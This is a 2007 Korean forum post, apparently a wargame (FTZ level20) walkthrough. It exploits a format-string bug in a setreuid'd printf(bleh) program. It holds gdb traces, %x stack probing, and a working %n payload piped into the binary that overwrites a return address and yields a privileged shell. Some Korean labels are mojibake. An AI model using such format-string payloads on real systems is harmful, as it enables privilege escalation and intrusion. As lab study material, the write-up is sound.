   pogusm
level20 / printf 함수의 RET값을 변경하여 쉘코드 실행하기.

http://www.hackerschool.org/HS_Boards/zboard.php?id=QNA_level&no=2580 [º¹»ç]


level20 / printf 함수의 RET값을 변경하여 쉘코드 실행하기.


[level20@ftz in]$ cat ~/hint

#include <stdio.h>
/*
 * Target program shown by `cat ~/hint`: reads one line from stdin and
 * passes it to printf() as the format string, so whoever feeds stdin
 * controls every conversion directive (a format-string bug).
 *
 * No return type is written: this is the pre-C99 implicit-int form of main.
 */
main(int argc,char **argv)
{ char bleh[80];
  setreuid(3101,3101);   /* real and effective uid become 3101 before any input is read */
  fgets(bleh,79,stdin);  /* at most 78 bytes plus a terminating NUL are stored in bleh[80] */
  printf(bleh);          /* bleh is the format string, not an argument; the safe form is printf("%s", bleh) */
}


[level20@ftz in]$ ./egg 512 300
Using address: 0xbffff95c

[level20@ftz in]$ gdb -q ~/attackme
(gdb) disass main
Dump of assembler code for function main:
0x080483b8 <main+0>:    push   %ebp
0x080483b9 <main+1>:    mov    %esp,%ebp
0x080483bb <main+3>:    sub    $0x58,%esp
0x080483be <main+6>:    and    $0xfffffff0,%esp
0x080483c1 <main+9>:    mov    $0x0,%eax
0x080483c6 <main+14>:   sub    %eax,%esp
0x080483c8 <main+16>:   sub    $0x8,%esp
0x080483cb <main+19>:   push   $0xc1d
0x080483d0 <main+24>:   push   $0xc1d
0x080483d5 <main+29>:   call   0x80482f8 <setreuid>
0x080483da <main+34>:   add    $0x10,%esp
0x080483dd <main+37>:   sub    $0x4,%esp
0x080483e0 <main+40>:   pushl  0x80495c0
0x080483e6 <main+46>:   push   $0x4f
0x080483e8 <main+48>:   lea    0xffffffa8(%ebp),%eax
0x080483eb <main+51>:   push   %eax
0x080483ec <main+52>:   call   0x80482c8 <fgets>
0x080483f1 <main+57>:   add    $0x10,%esp
0x080483f4 <main+60>:   sub    $0xc,%esp
0x080483f7 <main+63>:   lea    0xffffffa8(%ebp),%eax
0x080483fa <main+66>:   push   %eax
0x080483fb <main+67>:   call   0x80482e8 <printf>
0x08048400 <main+72>:   add    $0x10,%esp
0x08048403 <main+75>:   leave
0x08048404 <main+76>:   ret
0x08048405 <main+77>:   nop
0x08048406 <main+78>:   nop
0x08048407 <main+79>:   nop
End of assembler dump.
(gdb) br *main+1
Breakpoint 1 at 0x80483b9
(gdb) r
Starting program: /home/level20/attackme

Breakpoint 1, 0x080483b9 in main ()
(gdb) x/x $esp
0xbffff0c8:     0xbffff0e8
(gdb)
0xbffff0cc:     0x40038917
(gdb)

/// GDB를 통해, main+0까지 실행된 상태에서의 스택포인터(esp=0xbffff0c8)의 값은 0xbffff0e8(=이전ebp주소).
/// 현재스택포인터+0x4(esp+0x4) = RET주소가 저장된 스택의 위치.
/// 이전ebp주소로부터 RET주소가 저장된 스택 까지의 거리는 0xbffff0e8 - 0xbffff0cc = 0x1c(=28)

[level20@ftz in]$ gdb -q ~/attackme
(gdb) br *main+1
Breakpoint 1 at 0x80483b9
(gdb) r
Starting program: /home/level20/attackme

Breakpoint 1, 0x080483b9 in main ()
(gdb) disass printf
Dump of assembler code for function printf:
0x40074f80 <printf+0>:  push   %ebp
0x40074f81 <printf+1>:  mov    %esp,%ebp
0x40074f83 <printf+3>:  sub    $0x18,%esp
0x40074f86 <printf+6>:  mov    %ebx,0xfffffffc(%ebp)
0x40074f89 <printf+9>:  mov    0x8(%ebp),%eax
0x40074f8c <printf+12>: lea    0xc(%ebp),%edx
0x40074f8f <printf+15>: call   0x4003877d <__i686.get_pc_thunk.bx>
0x40074f94 <printf+20>: add    $0xe422c,%ebx
0x40074f9a <printf+26>: mov    %eax,0x4(%esp,1)
0x40074f9e <printf+30>: mov    0x118(%ebx),%eax
0x40074fa4 <printf+36>: mov    %edx,0x8(%esp,1)
0x40074fa8 <printf+40>: mov    (%eax),%eax
0x40074faa <printf+42>: mov    %eax,(%esp,1)
0x40074fad <printf+45>: call   0x4006a690 <vfprintf>
0x40074fb2 <printf+50>: mov    0xfffffffc(%ebp),%ebx
0x40074fb5 <printf+53>: mov    %ebp,%esp
0x40074fb7 <printf+55>: pop    %ebp
0x40074fb8 <printf+56>: ret
0x40074fb9 <printf+57>: nop
0x40074fba <printf+58>: nop
0x40074fbb <printf+59>: nop
0x40074fbc <printf+60>: nop
0x40074fbd <printf+61>: nop
0x40074fbe <printf+62>: nop
0x40074fbf <printf+63>: nop
End of assembler dump.
(gdb) br *printf+1
Breakpoint 2 at 0x40074f81
(gdb) c
Continuing.
%x%x%x

Breakpoint 2, 0x40074f81 in printf () from /lib/libc.so.6
(gdb) x/x $esp
0xbffff058:     0xbffff0c8
(gdb)
0xbffff05c:     0x08048400
(gdb)

/// GDB를 통해, printf+0까지 실행된 상태에서의 스택포인터(esp=0xbffff058)의 값은 0xbffff0c8(=이전ebp주소).
/// 현재스택포인터+0x4(esp+0x4) = RET주소가 저장된 스택의 위치.
/// main 함수의 이전ebp주소로부터 RET주소가 저장된 스택 까지의 거리는 0xbffff0e8 - 0xbffff05c = 0x8c(=140)
/// (printf 함수의 이전ebp주소로부터 RET주소가 저장된 스택 까지의 거리는 0xbffff0c8 - 0xbffff05c = 0x6c(=108))



* 스택의 구조

          data in/out


         |                                 |
         +--------------- ------+
         |   data                        |     .
         +--------------- ------+
         |   data                        |     .
         +--------------- ------+
         | ebpÀÇÁÖ¼Ò : 0xbffff0c8  |     $esp(=0xbffff058) (E)             ^
         +--------------- ------+                                               |
         | RET °ª :  0x08048400   |     0xbffff05c (D)                       +-----  printf ÇÔ¼öÀÇ ½ºÅúκÐ
         +--------------- ------+
         |   data                        |     .
         +--------------- ------+
         |   data                        |     .
         +--------------- ------+
         | ebpÀÇÁÖ¼Ò : 0xbffff0e8  |     $esp(=0xbffff0c8) (C)           ^
         +--------------- ------+                                              |
         | RET °ª :  0x40038917   |     0xbffff0cc (B)                      +-----  main ÇÔ¼öÀÇ ½ºÅúκÐ
         +--------------- ------+
         |   data                        |     .
         +--------------- ------+
         |   data                        |     .
         +--------------- ------+
         |   data                        |     .
         +--------------- ------+
         | ebpÀÇÁÖ¼Ò                  |     0xbffff0e8  (A)
         +--------------- ------+
         |   RET °ª                    |     0xbffff0ec
         +--------------- ------+



/// hint에서 확인한 바로는, ~/attackme 프로그램은 포맷스트링 버그가 있고,
/// fgets(bleh,79,stdin); 에 의해서, 79개의 문자열을 printf로 넘길수 있다..
/// 쉘상태에서의 RET주소를 확인해보자.

[level20@ftz in]$ ~/attackme
%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x
4f401574604009d500782578257825782578257825782578257825782578257825782578257825782578257825782578257825782578257825782578257825782578257825782578257825782578257825782578258007825401591c040015360bffff0c8400389171bffff0f4bffff0fc4001582c180483080804832980483b81bffff0f48048408

/// 위와 같은 방법으로 포맷스트링버그를 이용하여, %x를 최대 39개까지(78문자열) 넘길수 있다.
/// 이때 출력되는 값은, 출력되는 순간의 현재 %esp의 값부터, +0x4 씩 순차적으로 출력되는것 같다.
/// 위 결과에서, 기준이 되는 main함수의 RET값을 확인해보니, ....bffff0c840038917... 라고 확인할 수 있다.
/// (bffff0c8 는
/// 위표에서는 $esp(=0xbffff0c8) --> ebp의주소 : 0xbffff0e8 (C) 부분의,
/// ebp의주소 : 0xbffff0e8 주소와 대응되는것이다. (gdb상태에서의 실행과 shell상태에서의 실행이 다른 이유임)
/// 표에서 (E)부분과는 별개이다. 혼돈주의)
/// 즉, 0xbffff0c8-0x8c(=140) = 0xBFFFF03C 주소에 printf 함수에서 사용할 이전함수(main)의 RET값(0x08048400)이 저장되어 있다고 유추할수 있다.
/// ( 0xbffff0c8-0x1c= 0xBFFFF0AC 주소에는 main함수에서 사용할 이전함수의 RET값(840038917)이 저장되어 있다고 유추할수 있다.)

/// [level20@ftz in]$ ~/attackme
/// %x%x%x%x%x%x%x%x%x..........
/// 위와 같은 방법으로, 직접 printf함수가 사용하는 RET값(0x08048400)을 찾을수도 있겠으나,
/// 공격대상 프로그램 fgets 함수가.. 표준입력되어진 문자열을 79개까지만 한정했기때문에...
/// 그 범위를 벗어나는 printf함수가 사용하는 RET값까지는 추적할 수 없었다...


/// 공격준비
[level20@ftz in]$ ~/attackme
AAAABBBB %x %x %x %x %x
AAAABBBB 4f 40157460 4009d500 41414141 42424242

/// 위 결과로써, $-flag를 이용해서 format string공격을 할수 있다.
/// main의 0xBFFFF03C주소에 들어있는 정상적인 RET값(0x08048400)을,
/// 쉘코드가 시작되는 곳의 주소로 덮어씌우기할것이다.

Using address: 0xbffff95c

0xf95c =63836
63836-8byte = 63828

0x1bfff = 114687
114687-63836=50851

"\x3c\xf0\xff\xbf"+"\x3e\xf0\xff\xbf"  -- 8byte
"%63828x%4$n%50851x%5$n"

[level20@ftz in]$ (python -c 'print "\x3c\xf0\xff\xbf"+"\x3e\xf0\xff\xbf"+"%63828x%4$n%50851x%5$n"';cat) | ~/attackme
..............생략............................
                                                                               40157460
id
uid=3101(clear) gid=3100(level20) groups=3100(level20)
my-pass
TERM environment variable not set.

clear Password is "************************".

---------------------------------------------------------------------------------------------
참고문서--
How to make shellcode in linux for beginners ( http://hdp.null2root.org/system/willy_sc.txt )
Format-String-Bug 이해하기 (http://badnom.com/211)
$-flag를 이용한 Format String 공격 (http://x82.inetcop.org/h0me/papers/$-flag-formatstring.txt)
해커스쿨 질문과답변게시판 randomkid님의 글 (http://www.hackerschool.org/HS_Boards/zboard.php?id=QNA_level&page=1&sn1=&divpage=1&sn=off&ss=on&sc=on&select_arrange=headnum&desc=asc&no=2578)

  Hit : 3829     Date : 2007/11/23 03:44


